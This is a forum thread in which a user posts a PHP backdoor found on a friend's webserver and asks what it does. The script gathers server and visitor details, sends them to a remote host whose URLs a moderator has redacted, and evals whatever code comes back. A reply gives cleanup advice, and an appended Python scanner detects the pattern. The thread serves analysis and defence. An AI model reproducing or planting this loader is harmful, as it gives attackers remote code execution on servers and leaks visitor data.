A friend of mine got this file uploaded to his webserver, probably by a hacker, but this is not confirmed. He had lots of trouble deleting it but managed it in the end.
He sent me the code and I'm having a hard time figuring out what it does. All I can see is that it encodes lots of server information, but I don't know the purpose, and I was wondering if any of you could figure out what it does?
DISCLAIMER:
If you do not know what you are doing, do not attempt to use this code on your own site as it may harm your site!
<? error_reporting(0); // suppress any warnings the script itself would raise
$s="e";
// Harvest request and server details: host, server name, URI, script path, query string,
// referer, user agent, client IP, script filename on disk, accepted languages
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
// Pack all of it, base64-encoded and dot-separated, into one string that is appended to every request below
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
// Fetch and execute whatever the remote location returns; the base64 strings holding the
// remote URL were redacted ("...") by the moderator. Each branch is a fallback for the
// previous one: remote include, then file_get_contents + eval, then curl + eval.
if((include(base64_decode("...").base64_decode("...")."/?".$str)));
else if(include(base64_decode("...").base64_decode("...")."/?".$str));
else if($c=file_get_contents(base64_decode("...").$str))eval($c);
else{$cu=curl_init(base64_decode("...").$str);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$str=curl_exec($cu);
curl_close($cu);
eval($str);
}; ?>
[edited by: jatar_k at 11:05 pm (utc) on July 8, 2008]
[edit reason] obfuscated [/edit]
Definitely find out how this was put where it is on his server and remove all scripts. You might want to change over to safe_mode in your php.ini file for the moment until you get things straightened out.
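A defender-side check for the "remove all scripts" advice above, added here as an example and not code from either poster: a small Python scanner that walks a webroot and flags PHP files showing the same combination of indicators as the script in the question (error suppression, harvesting of $_SERVER fields, base64_encode of them, include/file_get_contents/curl_exec on a base64_decode'd string, eval of the result). The indicator names, the threshold and both sample files are my own constructions.

```python
import os
import re

# Indicators modelled on the posted script. Each one also appears in legitimate
# PHP, so a file is only flagged when several of them occur together.
INDICATORS = {
    "silences_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "harvests_request": re.compile(
        r"\$_SERVER\s*\[\s*['\"](HTTP_HOST|SERVER_NAME|REQUEST_URI|REMOTE_ADDR|"
        r"HTTP_USER_AGENT|SCRIPT_FILENAME|HTTP_REFERER)['\"]\s*\]"),
    "encodes_for_exfil": re.compile(r"base64_encode\s*\("),
    "remote_include": re.compile(r"include(_once)?\s*\(\s*base64_decode\s*\("),
    "fetches_remote": re.compile(r"(file_get_contents|curl_exec)\s*\("),
    "evals_variable": re.compile(r"eval\s*\(\s*\$\w+\s*\)"),
}

def scan_source(src, threshold=4):
    """Count indicator matches in one PHP source; flag when >= threshold kinds hit."""
    hits = {name: len(rx.findall(src)) for name, rx in INDICATORS.items()}
    matched = [name for name, count in hits.items() if count]
    return {"hits": hits, "matched": matched, "suspicious": len(matched) >= threshold}

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a webroot and return {path: matched indicators} for every flagged file."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
                if result["suspicious"]:
                    flagged[path] = result["matched"]
    return flagged

# Constructed sample: the shape of the posted dropper, redacted URLs kept as "...".
SAMPLE_BACKDOOR = r'''<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($h);
if((include(base64_decode("...")."/?".$str)));
else if($c=file_get_contents(base64_decode("...").$str))eval($c);
?>'''

# Constructed benign file: shares three indicators but none of the remote-code ones.
SAMPLE_BENIGN = r'''<?php
$cfg = json_decode(file_get_contents(__DIR__ . "/config.json"), true);
$csrf = base64_encode(random_bytes(16));
echo htmlspecialchars($_SERVER["REQUEST_URI"]);
?>'''
```

Run scan_tree("/path/to/webroot") and review each flagged file by hand; the threshold keeps ordinary config loaders and token generators out of the results while still catching the stacked include/fetch/eval pattern.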